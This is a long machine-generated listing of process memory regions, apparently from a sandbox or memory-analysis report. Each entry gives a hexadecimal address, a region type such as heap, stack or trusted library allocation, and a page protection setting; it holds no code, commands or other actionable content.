page read and write
1A54B558000
trusted library allocation
page read and write
7FF511622000
unkown
page readonly
B060000
unkown
page readonly
59A0000
heap
page read and write
6008000
heap
page read and write
2843000
heap
page read and write
12FC7AD0000
heap
page read and write
CE77000
unkown
page readonly
A0B8000
heap
page read and write
8603000
heap
page read and write
28189718000
trusted library allocation
page read and write
1C7C7460000
trusted library allocation
page read and write
3107000
stack
page read and write
12FE01B0000
trusted library allocation
page read and write
12FC5FA0000
heap
page read and write
8500000
heap
page read and write
33A0000
unkown
page readonly
2062625C000
heap
page read and write
59A0000
heap
page read and write
590B000
heap
page read and write
7FF9F1820000
trusted library allocation
page read and write
9E87000
heap
page read and write
86A8000
heap
page read and write
3121000
heap
page read and write
7FF9F17F0000
trusted library allocation
page read and write
A09C000
heap
page read and write
7FF9F1774000
trusted library allocation
page read and write
1A563840000
trusted library allocation
page read and write
E88A000
stack
page read and write
4730000
unkown
page read and write
31BB000
trusted library allocation
page execute and read and write
9F77000
heap
page read and write
CF18000
unkown
page readonly
103A2000
heap
page read and write
A15D000
heap
page read and write
859C000
heap
page read and write
1430000
unkown
page readonly
310B000
heap
page read and write
7ECC000
unkown
page read and write
12FE04C0000
trusted library allocation
page read and write
281872B0000
heap
page read and write
2E1F000
unkown
page read and write
5C82000
unkown
page read and write
A18A000
heap
page read and write
9BFE000
stack
page read and write
7FF9F18F0000
trusted library allocation
page read and write
CA83000
unkown
page readonly
281A1420000
trusted library allocation
page read and write
4F8B3FE000
stack
page read and write
4720000
unkown
page read and write
7FF511617000
unkown
page readonly
15629508000
heap
page read and write
9F7D000
heap
page read and write
5978000
heap
page read and write
A1EA000
heap
page read and write
1550C0B000
stack
page read and write
2811000
heap
page read and write
C9BA000
stack
page read and write
20626250000
heap
page read and write
83ED000
heap
page read and write
28238F10000
trusted library allocation
page read and write
8590000
heap
page read and write
59A0000
heap
page read and write
1550B0E000
stack
page read and write
2D08000
stack
page read and write
7FF5112AE000
unkown
page readonly
1A54B74E000
trusted library allocation
page read and write
83A0000
heap
page read and write
A1A6000
heap
page read and write
5BF9000
unkown
page read and write
7FF9F1790000
trusted library allocation
page execute and read and write
A043000
heap
page read and write
7FFF000
unkown
page read and write
2E90000
heap
page read and write
FE0000
unkown
page readonly
1C7C72D3000
heap
page read and write
2E8E000
stack
page read and write
7DF45EE31000
trusted library allocation
page execute read
2F6F000
heap
page read and write
12FE04D0000
trusted library allocation
page read and write
103C6000
heap
page read and write
DE0B000
stack
page read and write
1200000
heap
page read and write
7FF511758000
unkown
page readonly
7FF511295000
unkown
page readonly
A06C000
heap
page read and write
26AC6800000
trusted library allocation
page read and write
520E000
stack
page read and write
4B23000
heap
page read and write
723FCFF000
stack
page read and write
9E89000
heap
page read and write
A15E000
heap
page read and write
12FDFF82000
heap
page read and write
7FFF000
unkown
page read and write
1E4A8BB2000
heap
page read and write
60ED000
heap
page read and write
12FE08B0000
trusted library allocation
page read and write
12FC8F10000
trusted library allocation
page read and write
7FF5112F0000
unkown
page readonly
7FF5119B4000
unkown
page readonly
319A000
heap
page read and write
310E000
stack
page read and write
608A000
heap
page read and write
85DE000
heap
page read and write
C83F000
stack
page read and write
281894FC000
trusted library allocation
page read and write
9EB0000
heap
page read and write
599D000
heap
page read and write
C88E000
stack
page read and write
CA38000
stack
page read and write
2060DFDA000
trusted library allocation
page read and write
9F79000
heap
page read and write
18D55280000
trusted library allocation
page read and write
7FF5118CB000
unkown
page readonly
2339503C000
heap
page read and write
A089000
heap
page read and write
7A5F000
unkown
page readonly
9FE8000
heap
page read and write
1A54B6C4000
trusted library allocation
page read and write
1A10CB11000
heap
page read and write
5962000
heap
page read and write
B648000
stack
page read and write
7EBA000
unkown
page read and write
7ED2000
unkown
page read and write
D59D000
heap
page read and write
7E82000
unkown
page read and write
27E30302000
trusted library allocation
page read and write
8177000
unkown
page read and write
5F99000
heap
page read and write
12FE07C0000
trusted library allocation
page read and write
A194000
heap
page read and write
CFFC000
unkown
page readonly
826F000
stack
page read and write
3300000
unkown
page read and write
7DF45EE51000
trusted library allocation
page execute read
9F59000
heap
page read and write
A1D2000
heap
page read and write
8635000
heap
page read and write
3270000
trusted library allocation
page read and write
9E89000
heap
page read and write
9EB9000
heap
page read and write
816F000
unkown
page read and write
5188000
stack
page read and write
696E000
stack
page read and write
856E000
heap
page read and write
5B80000
unkown
page read and write
EC40000
heap
page read and write
7FFA5B56E000
unkown
page read and write
7FF5119A1000
unkown
page readonly
2F84000
heap
page read and write
A149000
heap
page read and write
60CA000
heap
page read and write
1131000
heap
page read and write
F04A000
unkown
page execute and read and write
A62B58B000
stack
page read and write
328B000
stack
page read and write
E666000
unkown
page read and write
85F6000
heap
page read and write
27E30213000
unkown
page read and write
8521000
heap
page read and write
6C7D000
stack
page read and write
7FF5118C7000
unkown
page readonly
508B000
stack
page read and write
9F59000
heap
page read and write
81DB000
unkown
page read and write
26AC1B04000
heap
page read and write
CFD4000
unkown
page readonly
34FD000
stack
page read and write
28251850000
trusted library allocation
page read and write
7FF9F17B0000
trusted library allocation
page read and write
7FF5112F0000
unkown
page readonly
3280000
trusted library allocation
page read and write
BECB000
stack
page read and write
12FD7EE1000
trusted library allocation
page read and write
4947000
heap
page read and write
12FC61F0000
heap
page read and write
499E000
heap
page read and write
1220000
heap
page read and write
9F59000
heap
page read and write
26AC6760000
trusted library allocation
page read and write
7FF511906000
unkown
page readonly
9F69000
heap
page read and write
FF4A000
stack
page read and write
A0A5000
heap
page read and write
9EDE000
heap
page read and write
DF90000
heap
page read and write
B58000
trusted library allocation
page read and write
7FF511601000
unkown
page readonly
4D50000
unkown
page readonly
A40000
heap
page read and write
7FF9F17A0000
trusted library allocation
page execute and read and write
8175000
unkown
page read and write
E13A000
unkown
page read and write
5C2D000
unkown
page read and write
112B000
heap
page read and write
23394F90000
trusted library allocation
page read and write
7FF9F18C0000
trusted library allocation
page read and write
7490000
heap
page readonly
D9BC000
stack
page read and write
7FF9F176D000
trusted library allocation
page read and write
1A10D09C000
heap
page read and write
7FF511A43000
unkown
page readonly
7FF9F17A0000
trusted library allocation
page execute and read and write
A15E000
heap
page read and write
835C000
heap
page read and write
A1E9000
heap
page read and write
D0DE000
unkown
page readonly
698F000
unkown
page read and write
BF0000
unkown
page readonly
7FFA5B56C000
unkown
page read and write
7727000
system
page read and write
7FF51187B000
unkown
page readonly
28251070000
trusted library allocation
page read and write
DD0000
heap
page read and write
1148C000
stack
page read and write
E95000
heap
page read and write
27E304F0000
trusted library allocation
page read and write
4F10000
unkown
page read and write
31CD000
heap
page read and write
2F6F000
heap
page read and write
2E1F000
unkown
page read and write
855D000
heap
page read and write
4FC0000
trusted library allocation
page read and write
1562946F000
heap
page read and write
3183000
stack
page read and write
A1C6000
heap
page read and write
7FF511557000
unkown
page readonly
6AFA000
unkown
page read and write
5580000
unkown
page read and write
7FF9F1890000
trusted library allocation
page read and write
D00000
remote allocation
page read and write
1A56346D000
heap
page read and write
2F3E000
heap
page read and write
7FED000
stack
page read and write
A43C000
stack
page read and write
7977000
unkown
page readonly
A187000
heap
page read and write
A03A000
heap
page read and write
1A10B0B7000
heap
page read and write
8550000
heap
page read and write
E6D9000
unkown
page read and write
5925000
heap
page read and write
7473000
trusted library allocation
page read and write
18D54341000
heap
page read and write
2DAF000
stack
page read and write
F11000
heap
page read and write
3931000
trusted library allocation
page read and write
7FFA5BCF3000
unkown
page read and write
8331000
heap
page read and write
9EB5000
heap
page read and write
4DDB0FC000
stack
page read and write
1020000
heap
page read and write
2FAC000
stack
page read and write
28251080000
trusted library allocation
page read and write
1A10B040000
heap
page read and write
1360000
heap
page read and write
1122000
heap
page read and write
A1DA000
heap
page read and write
CDAD000
unkown
page readonly
D21E000
unkown
page readonly
1E4A7190000
heap
page read and write
7FF9F16F0000
trusted library allocation
page execute and read and write
7FF5113D1000
unkown
page readonly
554000
heap
page read and write
1A549542000
heap
page read and write
A060000
heap
page read and write
85D2000
heap
page read and write
282389F0000
heap
page read and write
10A8A000
heap
page read and write
7FF5116F0000
unkown
page readonly
7FFA5BCFC000
unkown
page read and write
85F8000
heap
page read and write
69D0000
unkown
page read and write
7FF9F1686000
trusted library allocation
page execute and read and write
819D000
unkown
page read and write
7FF51167C000
unkown
page readonly
282510E0000
heap
page read and write
A19E000
heap
page read and write
57EC000
heap
page read and write
D190000
unkown
page readonly
5BB2000
unkown
page read and write
28199111000
trusted library allocation
page read and write
1C7AD17A000
heap
page read and write
9E85000
heap
page read and write
A62BD7E000
stack
page read and write
2CCDD0F000
stack
page read and write
7FF5118CB000
unkown
page readonly
DB8000
heap
page read and write
154FDB7000
stack
page read and write
4947000
heap
page read and write
7FF511A0C000
unkown
page readonly
D0F3000
unkown
page readonly
84CE000
heap
page read and write
28236FFE000
heap
page read and write
A1EA000
heap
page read and write
7FF5115D2000
unkown
page readonly
987B000
stack
page read and write
A194000
heap
page read and write
7FFA5B563000
unkown
page read and write
8175000
unkown
page read and write
7FF5118CB000
unkown
page readonly
85F0000
heap
page read and write
5882000
heap
page read and write
4F8BBFF000
stack
page read and write
46D000
heap
page read and write
847D000
heap
page read and write
5981000
heap
page read and write
7FF5119C6000
unkown
page readonly
11D1279000
stack
page read and write
FFCE000
heap
page read and write
85C9000
heap
page read and write
AC3B000
stack
page read and write
554000
heap
page read and write
494E000
heap
page read and write
12FE01C6000
heap
page read and write
26AC1A00000
heap
page read and write
49BB000
heap
page read and write
CA72000
unkown
page readonly
10A80000
heap
page read and write
281A1F9A000
heap
page read and write
7FF511954000
unkown
page readonly
59B9000
heap
page read and write
F30000
unkown
page read and write
B060000
unkown
page readonly
85BE000
heap
page read and write
7FF5051D1000
unkown
page readonly
752A000
system
page read and write
DF40000
heap
page read and write
26AC1000000
heap
page read and write
7DF419780000
trusted library allocation
page readonly
E38B000
stack
page read and write
2CCE6FB000
stack
page read and write
8524000
heap
page read and write
81CE000
unkown
page read and write
D269000
unkown
page readonly
49A5000
heap
page read and write
E55C000
unkown
page read and write
7FF5117CF000
unkown
page readonly
69D0000
unkown
page read and write
85BB000
heap
page read and write
12FC7B90000
heap
page read and write
83DA000
heap
page read and write
D1CC000
unkown
page readonly
28238F20000
trusted library allocation
page read and write
58BB000
heap
page read and write
7FF5112FE000
unkown
page readonly
D0FE000
unkown
page readonly
1A10AFB0000
heap
page read and write
7FF5114E7000
unkown
page readonly
A60E000
stack
page read and write
7FF511529000
unkown
page readonly
48D0000
unkown
page read and write
4900000
heap
page read and write
D58E000
heap
page read and write
12FE01A1000
trusted library allocation
page read and write
E39E000
stack
page read and write
A1EA000
heap
page read and write
12FE08A0000
trusted library allocation
page read and write
26AC6590000
trusted library allocation
page read and write
86A9000
heap
page read and write
E178000
unkown
page read and write
9E83000
heap
page read and write
7480000
trusted library allocation
page read and write
83AC000
heap
page read and write
60ED000
heap
page read and write
7485000
trusted library allocation
page read and write
5C55000
unkown
page read and write
590B000
heap
page read and write
DF55000
heap
page read and write
4A70000
trusted library allocation
page execute and read and write
8689000
stack
page read and write
7FF51179B000
unkown
page readonly
4E85000
stack
page read and write
86A8000
heap
page read and write
7FF5119CA000
unkown
page readonly
7D55000
unkown
page readonly
86AB000
heap
page read and write
57D0000
heap
page read and write
28189090000
trusted library allocation
page read and write
7FF5114E5000
unkown
page readonly
2060C09E000
heap
page read and write
31BE000
heap
page read and write
1C7AEB00000
heap
page read and write
8473000
heap
page read and write
7FF511959000
unkown
page readonly
8528000
heap
page read and write
752A000
system
page read and write
7EB7000
unkown
page read and write
5800000
heap
page read and write
26D1A7E000
stack
page read and write
85D3000
heap
page read and write
1150C000
stack
page read and write
7FF5117AE000
unkown
page readonly
A0B8000
heap
page read and write
2E90000
heap
page read and write
2D08000
stack
page read and write
2843000
heap
page read and write
927D000
stack
page read and write
A02A000
heap
page read and write
9F04000
heap
page read and write
8467000
heap
page read and write
A1C3000
heap
page read and write
103A2000
heap
page read and write
7583000
unkown
page readonly
2CA7000
stack
page read and write
7FF9F1860000
trusted library allocation
page read and write
4910000
heap
page read and write
7FF511AB3000
unkown
page readonly
2060C110000
heap
page read and write
86A8000
heap
page read and write
12FE0880000
trusted library allocation
page read and write
D04E000
unkown
page readonly
318C000
stack
page read and write
84F1000
heap
page read and write
8517000
heap
page read and write
6AFA000
unkown
page read and write
52B4000
unkown
page read and write
CE41000
unkown
page readonly
7FF511689000
unkown
page readonly
DB8000
heap
page read and write
7FFA5B4B9000
unkown
page readonly
7FFA594EC000
unkown
page read and write
8517000
heap
page read and write
5816000
heap
page read and write
E68000
heap
page read and write
7E40000
unkown
page read and write
DF74000
heap
page read and write
4F08000
stack
page read and write
1550A8E000
stack
page read and write
9E85000
heap
page read and write
E8A000
heap
page read and write
4890000
unkown
page read and write
7CA3000
unkown
page readonly
86A8000
heap
page read and write
12FC5E00000
heap
page read and write
7FFA5B58A000
unkown
page readonly
3115000
heap
page read and write
11D0D6B000
stack
page read and write
F30000
heap
page read and write
FDC58FA000
stack
page read and write
7FFA5BCF5000
unkown
page read and write
85F8000
heap
page read and write
7DF45EE51000
trusted library allocation
page execute read
7A35000
unkown
page readonly
7FF51123B000
unkown
page readonly
3640000
heap
page read and write
7FF5112BD000
unkown
page readonly
28238F10000
trusted library allocation
page read and write
E848000
unkown
page read and write
4E00000
trusted library allocation
page read and write
7FF511499000
unkown
page readonly
281874A0000
trusted library allocation
page read and write
282389D0000
trusted library allocation
page read and write
A5BE000
stack
page read and write
3107000
stack
page read and write
B14B000
stack
page read and write
4FC0000
unkown
page readonly
927D000
stack
page read and write
28251800000
trusted library allocation
page read and write
D435000
system
page execute and read and write
5410000
unkown
page readonly
EE0000
heap
page read and write
7FF5118BE000
unkown
page readonly
59B9000
heap
page read and write
28187320000
heap
page read and write
12FC8C83000
trusted library allocation
page read and write
2060E305000
trusted library allocation
page read and write
7FF511A28000
unkown
page readonly
7FF511689000
unkown
page readonly
D599000
heap
page read and write
81CE000
unkown
page read and write
1A54B5FC000
trusted library allocation
page read and write
607C000
heap
page read and write
A0D2000
heap
page read and write
23395064000
heap
page read and write
7CF5000
unkown
page readonly
12FE07F0000
trusted library allocation
page read and write
7FF511A21000
unkown
page readonly
1200000
heap
page read and write
318E000
stack
page read and write
7EE5000
unkown
page read and write
7FF511945000
unkown
page readonly
5BF9000
unkown
page read and write
103EC000
heap
page read and write
7FF5116E7000
unkown
page readonly
A4B9000
stack
page read and write
7FF511AB3000
unkown
page readonly
58BF000
heap
page read and write
A3F848D000
stack
page read and write
E51B000
stack
page read and write
9F04000
heap
page read and write
2B40000
trusted library allocation
page execute and read and write
7FF9F1847000
trusted library allocation
page read and write
9FC9000
heap
page read and write
281A1FBF000
heap
page read and write
30E0000
heap
page read and write
79F1000
unkown
page readonly
854B000
heap
page read and write
9AFA000
stack
page read and write
31B8000
heap
page read and write
2F7D000
heap
page read and write
12FE0180000
trusted library allocation
page read and write
28251080000
trusted library allocation
page read and write
E1E0000
unkown
page read and write
2DEF000
trusted library allocation
page execute and read and write
10C0000
trusted library allocation
page read and write
7FF5118AF000
unkown
page readonly
18D54260000
heap
page read and write
7FFA5BD00000
unkown
page read and write
5188000
stack
page read and write
69D0000
unkown
page read and write
7323000
trusted library allocation
page read and write
9D7F000
stack
page read and write
7490000
heap
page readonly
4F10000
unkown
page read and write
1A549533000
heap
page read and write
7FF9F18B0000
trusted library allocation
page read and write
103A9000
heap
page read and write
7D33000
unkown
page readonly
54F4000
stack
page read and write
2F7D000
heap
page read and write
855B000
heap
page read and write
15629330000
heap
page read and write
7FFA5BB60000
unkown
page readonly
7FF9F15B4000
trusted library allocation
page read and write
D25C000
unkown
page readonly
497B000
heap
page read and write
DF74000
heap
page read and write
3389000
stack
page read and write
E68000
heap
page read and write
26AC6B00000
heap
page read and write
7FF51130E000
unkown
page readonly
A62B87E000
stack
page read and write
A0D7000
heap
page read and write
26AC10A3000
heap
page read and write
A03C000
heap
page read and write
337A000
stack
page read and write
83E6000
heap
page read and write
AC3B000
stack
page read and write
4F8B6FE000
stack
page read and write
2818957A000
trusted library allocation
page read and write
5320000
unkown
page read and write
8164000
unkown
page read and write
9EC4000
heap
page read and write
2060C180000
heap
page read and write
7FF9F1680000
trusted library allocation
page read and write
1C7AD148000
heap
page read and write
727B000
stack
page read and write
5320000
unkown
page read and write
7ECA000
unkown
page read and write
108E9000
heap
page read and write
D500000
trusted library allocation
page read and write
E38000
heap
page read and write
583E000
heap
page read and write
7FF5112BB000
unkown
page readonly
5BCF000
unkown
page read and write
18D552E0000
trusted library allocation
page read and write
4977000
heap
page read and write
E4A3000
unkown
page read and write
4750000
unkown
page read and write
883B000
stack
page read and write
7DF4197A1000
trusted library allocation
page execute read
80E5000
stack
page read and write
12FC6190000
heap
page execute and read and write
28251090000
trusted library allocation
page read and write
3187000
heap
page read and write
FF94000
heap
page read and write
A02A000
heap
page read and write
FF55000
heap
page read and write
15629450000
heap
page read and write
2016A06E000
heap
page read and write
18D54335000
heap
page read and write
5300000
unkown
page read and write
596E000
heap
page read and write
EF50000
unkown
page execute and read and write
D574000
heap
page read and write
D1CC000
unkown
page readonly
590B000
heap
page read and write
85F6000
heap
page read and write
2F64000
unkown
page read and write
281A1FB0000
heap
page read and write
605B000
heap
page read and write
49A0000
unkown
page read and write
D599000
heap
page read and write
463E87D000
stack
page read and write
20626230000
trusted library allocation
page read and write
7FF511850000
unkown
page readonly
588C000
heap
page read and write
D83B000
stack
page read and write
A1B7000
heap
page read and write
603F000
heap
page read and write
1C7AEB60000
trusted library allocation
page read and write
A0D2000
heap
page read and write
7DF527E20000
unkown
page readonly
A149000
heap
page read and write
7FF9F1771000
trusted library allocation
page read and write
472A000
unkown
page read and write
855D000
heap
page read and write
858C000
stack
page read and write
8689000
stack
page read and write
2ED1000
unkown
page read and write
7198000
heap
page read and write
7FF5112FE000
unkown
page readonly
2060C0E2000
heap
page read and write
206260A4000
heap
page read and write
1C7C7420000
trusted library allocation
page read and write
12FE07B0000
trusted library allocation
page read and write
2060DA80000
heap
page read and write
8369000
heap
page read and write
2ED1000
unkown
page read and write
DE43000
trusted library allocation
page read and write
AFCD000
stack
page read and write
6089000
heap
page read and write
1740000
heap
page read and write
8342000
heap
page read and write
A187000
heap
page read and write
7FF9F1840000
trusted library allocation
page read and write
1010000
unkown
page read and write
12FE0840000
trusted library allocation
page read and write
DB0000
heap
page read and write
8521000
heap
page read and write
EE96000
unkown
page read and write
D9C0000
heap
page read and write
27E30323000
heap
page read and write
2F74000
heap
page read and write
5936000
heap
page read and write
2D08000
stack
page read and write
7FF9F168C000
trusted library allocation
page execute and read and write
E522000
unkown
page read and write
CE77000
unkown
page readonly
CF47000
unkown
page readonly
85CD000
heap
page read and write
12FE01A0000
trusted library allocation
page read and write
7FF9F18E0000
trusted library allocation
page read and write
A1CD000
heap
page read and write
2F5D000
unkown
page read and write
5F8A000
heap
page read and write
12FC8399000
trusted library allocation
page read and write
8587000
heap
page read and write
4A7A000
stack
page read and write
28251780000
trusted library allocation
page read and write
7FF9F17E9000
trusted library allocation
page read and write
8620000
heap
page read and write
554000
heap
page read and write
7FFA5B3D0000
unkown
page readonly
9EA8000
heap
page read and write
5802000
heap
page read and write
2F76000
unkown
page read and write
7FF511858000
unkown
page readonly
2062602D000
heap
page read and write
85E9000
heap
page read and write
D4A0000
trusted library allocation
page read and write
4760000
unkown
page read and write
5FD4000
heap
page read and write
48B0000
unkown
page read and write
7FF51192A000
unkown
page readonly
8689000
stack
page read and write
1E4A913D000
heap
page read and write
D199000
unkown
page readonly
33D8000
stack
page read and write
12FE0800000
trusted library allocation
page read and write
A023000
heap
page read and write
FB0000
heap
page read and write
D0FE000
unkown
page readonly
58C5000
heap
page read and write
26AC6890000
remote allocation
page read and write
7DF419790000
trusted library allocation
page readonly
12FE07C0000
trusted library allocation
page read and write
5F7E000
heap
page read and write
9F79000
heap
page read and write
7FF9F1940000
trusted library allocation
page read and write
7DF4CFAA0000
trusted library allocation
page execute and read and write
9F59000
heap
page read and write
DB0000
heap
page read and write
CEF1000
unkown
page readonly
12FE07F2000
trusted library allocation
page read and write
9E00000
heap
page read and write
28251061000
trusted library allocation
page read and write
2ED1000
unkown
page read and write
D83B000
stack
page read and write
7FF9F167C000
trusted library allocation
page execute and read and write
82F1000
heap
page read and write
69A1000
unkown
page read and write
E38B000
stack
page read and write
1562944D000
heap
page read and write
18D5432E000
heap
page read and write
A074000
heap
page read and write
12FE08A0000
trusted library allocation
page read and write
12FC5F68000
heap
page read and write
A016000
heap
page read and write
D00000
remote allocation
page read and write
A0B8000
heap
page read and write
7FFA5BB61000
unkown
page execute read
10C8B000
stack
page read and write
7FF9F18E0000
trusted library allocation
page read and write
28238F30000
trusted library allocation
page read and write
3119000
heap
page read and write
7EED000
stack
page read and write
281A1FCF000
heap
page read and write
5902000
heap
page read and write
7FF9F1867000
trusted library allocation
page read and write
DF90000
heap
page read and write
80E5000
stack
page read and write
28187520000
heap
page read and write
F699000
stack
page read and write
9E99000
heap
page read and write
7FF51179B000
unkown
page readonly
28251770000
trusted library allocation
page read and write
31A3000
heap
page read and write
11A5F000
stack
page read and write
4978000
stack
page read and write
A022000
heap
page read and write
23395054000
heap
page read and write
855D000
heap
page read and write
2DA7000
stack
page read and write
510C000
stack
page read and write
5D49000
unkown
page read and write
12FC83BA000
trusted library allocation
page read and write
7FF511546000
unkown
page readonly
7C3C000
unkown
page readonly
12FE0840000
trusted library allocation
page read and write
596E000
heap
page read and write
7DF45EE31000
trusted library allocation
page execute read
18D54310000
heap
page read and write
5890000
heap
page read and write
7FF511546000
unkown
page readonly
B40000
trusted library allocation
page read and write
28236F49000
heap
page read and write
7EC2000
unkown
page read and write
9EB9000
heap
page read and write
589C000
heap
page read and write
7DF45EE51000
trusted library allocation
page execute read
2016A013000
heap
page read and write
85F6000
heap
page read and write
12FC7B50000
trusted library allocation
page read and write
18D54FCA000
trusted library allocation
page read and write
606A000
heap
page read and write
A06C000
heap
page read and write
7FF9F1830000
trusted library allocation
page read and write
4710000
trusted library allocation
page read and write
7FF51196C000
unkown
page readonly
7FF9F1752000
trusted library allocation
page read and write
7FF5000
unkown
page read and write
7DF45EE30000
trusted library allocation
page readonly
ED0000
trusted library allocation
page execute and read and write
7D69000
unkown
page readonly
12FE0006000
heap
page execute and read and write
DBBF000
stack
page read and write
85E4000
heap
page read and write
727B000
stack
page read and write
847D000
heap
page read and write
5BC1000
unkown
page read and write
F50000
unkown
page readonly
8720000
unkown
page readonly
82EE000
stack
page read and write
D22C000
unkown
page readonly
7DF425C41000
unkown
page execute read
AA33000
unkown
page read and write
A1B9000
heap
page read and write
A0A1000
heap
page read and write
30A0000
trusted library allocation
page execute and read and write
12FE0180000
trusted library allocation
page read and write
12FC8C90000
trusted library allocation
page read and write
7FF5118CF000
unkown
page readonly
103A9000
heap
page read and write
E76000
stack
page read and write
7FF511743000
unkown
page readonly
26AC1102000
heap
page read and write
7CCC000
unkown
page readonly
E5C000
heap
page read and write
1A10D152000
heap
page read and write
81DB000
unkown
page read and write
A43C000
stack
page read and write
883B000
stack
page read and write
463EE3C000
stack
page read and write
520E000
stack
page read and write
28239410000
trusted library allocation
page read and write
1A549460000
heap
page read and write
11A5F000
stack
page read and write
4FF0000
heap
page read and write
57E6000
heap
page read and write
1030000
unkown
page readonly
B1CC000
stack
page read and write
590B000
heap
page read and write
5487000
stack
page read and write
7FF9F1910000
trusted library allocation
page read and write
927D000
stack
page read and write
E54C000
unkown
page read and write
7FF51155B000
unkown
page readonly
9F59000
heap
page read and write
4AFC000
stack
page read and write
7FF511945000
unkown
page readonly
1A563521000
trusted library allocation
page read and write
281A1420000
trusted library allocation
page read and write
12FC8C96000
trusted library allocation
page read and write
1A54ADA6000
heap
page read and write
85BB000
heap
page read and write
2F74000
heap
page read and write
2339506E000
heap
page read and write
1C7C7460000
trusted library allocation
page read and write
84CE000
heap
page read and write
4BCE000
stack
page read and write
82F8000
heap
page read and write
E3B4000
unkown
page read and write
A62BB7E000
stack
page read and write
2F58000
stack
page read and write
4978000
stack
page read and write
CDC7000
unkown
page readonly
DBBF000
stack
page read and write
520E000
stack
page read and write
2825123E000
heap
page read and write
E33C000
unkown
page read and write
281A1FA8000
heap
page read and write
A60E000
stack
page read and write
1225000
heap
page read and write
54C0000
trusted library allocation
page read and write
7FF9F15D0000
trusted library allocation
page read and write
EB0F000
stack
page read and write
815C000
unkown
page read and write
5893000
heap
page read and write
D9C0000
heap
page read and write
D574000
heap
page read and write
2C10000
unkown
page readonly
1391000
heap
page read and write
318E000
stack
page read and write
4E85000
stack
page read and write
BD0000
unkown
page readonly
103F1000
heap
page read and write
8603000
heap
page read and write
26AC6AE8000
heap
page read and write
5BF9000
unkown
page read and write
8434000
heap
page read and write
84F4000
heap
page read and write
D596000
heap
page read and write
2F81000
heap
page read and write
594E000
heap
page read and write
2F15000
heap
page read and write
8171000
unkown
page read and write
D599000
heap
page read and write
2F2E000
heap
page read and write
5962000
heap
page read and write
1C7C7450000
trusted library allocation
page read and write
83DD000
heap
page read and write
1562943C000
heap
page read and write
7A5F000
unkown
page readonly
D197000
unkown
page readonly
2EB0000
unkown
page read and write
2062607C000
heap
page read and write
A41000
heap
page read and write
12FC5E60000
remote allocation
page read and write
9FC2000
heap
page read and write
E41A000
stack
page read and write
28250F74000
heap
page read and write
A0BE000
heap
page read and write
1108D000
unkown
page read and write
4740000
trusted library section
page read and write
85A0000
heap
page read and write
12FE04F0000
heap
page read and write
7FF511694000
unkown
page readonly
7FF9F1940000
trusted library allocation
page read and write
1C7C7420000
trusted library allocation
page read and write
1124000
heap
page read and write
D249000
unkown
page readonly
FF0000
remote allocation
page read and write
D272000
unkown
page readonly
7FF9F1809000
trusted library allocation
page read and write
EC40000
heap
page read and write
85D2000
heap
page read and write
72C0000
trusted library allocation
page read and write
86AB000
heap
page read and write
CDAD000
unkown
page readonly
8554000
heap
page read and write
94FD000
stack
page read and write
606A000
heap
page read and write
E29C000
stack
page read and write
1A55B251000
trusted library allocation
page read and write
7FF5119B6000
unkown
page readonly
99FC000
stack
page read and write
7EC0000
unkown
page read and write
9FC2000
heap
page read and write
9F7D000
heap
page read and write
7FF511870000
unkown
page readonly
12FDFF07000
heap
page read and write
869E000
heap
page read and write
7FF511734000
unkown
page readonly
6720000
trusted library allocation
page read and write
A089000
heap
page read and write
FF95000
heap
page read and write
7FF9F1850000
trusted library allocation
page read and write
D249000
unkown
page readonly
7FF5115AF000
unkown
page readonly
12FE01C0000
heap
page read and write
7FF9F1784000
trusted library allocation
page read and write
4C49000
stack
page read and write
7FF5115B5000
unkown
page readonly
2CA7000
stack
page read and write
1123000
heap
page read and write
7EF6000
unkown
page read and write
7FF5119B4000
unkown
page readonly
867D000
heap
page read and write
26AC6A00000
heap
page read and write
9E99000
heap
page read and write
108D0000
heap
page read and write
A1C5000
heap
page read and write
5400000
unkown
page read and write
856B000
heap
page read and write
2EC9000
heap
page read and write
7FFA59557000
unkown
page readonly
7FF9F18A0000
trusted library allocation
page read and write
85DB000
heap
page read and write
FDC5AFE000
stack
page read and write
72F0000
trusted library allocation
page read and write
F2E000
stack
page read and write
2F2E000
heap
page read and write
C9BA000
stack
page read and write
5BF9000
unkown
page read and write
7ED2000
unkown
page read and write
83EA000
heap
page read and write
8318000
heap
page read and write
281A1410000
trusted library allocation
page read and write
2BB0000
unkown
page readonly
7EF6000
unkown
page read and write
4760000
unkown
page read and write
D552000
heap
page read and write
A193000
heap
page read and write
2016A07B000
heap
page read and write
85F8000
heap
page read and write
F90000
trusted library section
page readonly
540000
heap
page read and write
DD0A000
stack
page read and write
3193000
heap
page read and write
28238F00000
trusted library allocation
page read and write
C8B6000
stack
page read and write
7FF511A5A000
unkown
page readonly
A199000
heap
page read and write
D18E000
unkown
page readonly
81AB000
unkown
page read and write
CE68000
unkown
page readonly
281A12B0000
trusted library allocation
page read and write
E94B000
stack
page read and write
84CE000
heap
page read and write
48F0000
trusted library section
page read and write
83ED000
heap
page read and write
A068000
heap
page read and write
5C12000
unkown
page read and write
1A563520000
trusted library allocation
page read and write
D113000
unkown
page readonly
E49E000
stack
page read and write
A6BB000
stack
page read and write
7FF511A5A000
unkown
page readonly
E13D000
unkown
page read and write
82EE000
stack
page read and write
DF8B000
stack
page read and write
4710000
trusted library allocation
page read and write
7325000
trusted library allocation
page read and write
D3C0000
system
page execute and read and write
7FF51178B000
unkown
page readonly
86AB000
heap
page read and write
4980000
unkown
page readonly
E202000
unkown
page read and write
28251070000
trusted library allocation
page read and write
18D54335000
heap
page read and write
7FF9F18F0000
trusted library allocation
page read and write
4371BEF000
stack
page read and write
18D541D0000
heap
page read and write
1C7AEB80000
trusted library allocation
page read and write
D558000
heap
page read and write
8590000
heap
page read and write
206260C0000
trusted library allocation
page read and write
4990000
unkown
page readonly
4730000
trusted library section
page read and write
26AC1125000
heap
page read and write
7FF9F1840000
trusted library allocation
page read and write
7AEC000
stack
page read and write
5E48000
stack
page read and write
9F06000
heap
page read and write
E10E000
unkown
page read and write
DF55000
heap
page read and write
31BB000
heap
page read and write
4AFC000
stack
page read and write
7FF9F168C000
trusted library allocation
page execute and read and write
7FF5117F4000
unkown
page readonly
9FF9000
heap
page read and write
D240000
unkown
page readonly
E47C000
unkown
page read and write
7ED0000
unkown
page read and write
A014000
heap
page read and write
D4C3000
trusted library allocation
page read and write
1A10B0B6000
heap
page read and write
281A1FE8000
heap
page read and write
AB38000
stack
page read and write
28251770000
trusted library allocation
page read and write
7D5C000
unkown
page readonly
D59D000
heap
page read and write
DD0000
heap
page read and write
1120000
heap
page read and write
4990000
unkown
page readonly
7C65000
unkown
page readonly
580B000
heap
page read and write
7300000
trusted library allocation
page read and write
7FF511310000
unkown
page readonly
85E9000
heap
page read and write
